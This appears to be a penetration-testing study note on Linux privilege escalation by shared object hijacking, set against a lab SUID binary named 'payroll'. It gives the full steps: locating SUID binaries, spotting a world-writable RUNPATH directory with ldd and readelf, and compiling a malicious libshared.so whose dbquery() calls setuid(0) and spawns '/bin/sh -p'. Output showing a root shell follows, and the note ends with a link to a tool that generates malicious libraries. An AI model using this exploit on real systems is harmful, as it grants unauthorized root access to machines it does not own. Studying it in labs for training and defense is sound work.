Shared Object Hijacking

Identification

find / -type f -perm -u=s 2>/dev/null | xargs ls -l

$ ls -la payroll

-rwsr-xr-x 1 root root 16728 Sep  1 22:05 payroll

Print the shared object required by a binary or shared object

$ ldd payroll

linux-vdso.so.1 =>  (0x00007ffcb3133000)
libshared.so => /lib/x86_64-linux-gnu/libshared.so (0x00007f7f62e51000)
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f7f62876000)
/lib64/ld-linux-x86-64.so.2 (0x00007f7f62c40000)

Runpath

$ readelf -d payroll  | grep PATH

 0x000000000000001d (RUNPATH)            Library runpath: [/development]

ls -la /development/

total 8
drwxrwxrwx  2 root root 4096 Sep  1 22:06 ./
drwxr-xr-x 23 root root 4096 Sep  1 21:26 ../

cp /lib/x86_64-linux-gnu/libc.so.6 /development/libshared.so

$ ldd payroll

linux-vdso.so.1 (0x00007ffd22bbc000)
libshared.so => /development/libshared.so (0x00007f0c13112000)
/lib64/ld-linux-x86-64.so.2 (0x00007f0c1330a000)

Running ldd against the binary lists the library's path as /development/libshared.so, which means that it is vulnerable

$ ./payroll 

./payroll: symbol lookup error: ./payroll: undefined symbol: dbquery

Compile a shared object which includes the missing function

Exploitation

#include<stdio.h>
#include<stdlib.h>

void dbquery() {
    printf("Malicious library loaded\n");
    setuid(0);
    system("/bin/sh -p");
} 

gcc src.c -fPIC -shared -o /development/libshared.so

$ ./payroll 

***************Inlane Freight Employee Database***************

Malicious library loaded
# id
uid=0(root) gid=1000(mrb3n) groups=1000(mrb3n)

Tool

GitHub - eblazquez/fakelib.sh: Simple tool/script for generating malicious Linux shared librariesGitHub

Resources

Linux Privilege Escalation: Abusing shared librariesBoiteAKlou’s Infosec Blog

Shared Library Hijacking - Exploit Notesexploit-notes.hdks.org

HTB: Dab0xdf hacks stuff